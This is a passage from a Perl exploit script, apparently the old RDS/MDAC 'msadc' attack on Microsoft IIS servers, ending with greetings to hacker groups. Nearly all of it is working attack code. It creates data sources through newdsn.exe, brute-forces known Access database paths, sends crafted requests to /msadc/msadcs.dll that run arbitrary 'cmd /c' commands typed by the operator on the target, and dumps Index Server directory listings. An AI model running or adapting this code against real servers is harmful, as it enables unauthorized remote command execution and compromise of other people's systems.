my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
##############################################################################
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
##############################################################################
sub try_btcustmr {
foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";
save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
##############################################################################
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
##############################################################################
sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}
##############################################################################
sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
$args{$switch}="1";}
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
$torun="$p[3]"; $torun=~s/\n//g;
if($torun=~/btcustmr/){
$args{'c'}="1";} # this is a kludge to make it work
if($torun=~/^dbq/){ $torun=$drvst.$torun; }
if(run_query("$torun")){
print "Success!\n";} else { print "failed\n"; }
exit;}
##############################################################################
sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
##############################################################################
sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
##############################################################################
sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
foreach $drive (@drives) {
foreach $dir (@sysdirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv.$drive.":\\".$dir.$mdb)){
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
}}}}}
foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv.$drive.":".$mdb)){
if(run_query($drv.$drive.":".$mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
}}}}
}
##############################################################################
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}
##############################################################################
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}
##############################################################################
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
##############################################################################
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}
##############################################################################
sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("Server: ",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
exit;}
##############################################################################
sub use_unc {
$uncpath=$args{u};
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
if(create_table($driverline.$uncpath)){
if(run_query($driverline.$uncpath)){
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}
##############################################################################
sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}
##############################################################################
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
##############################################################################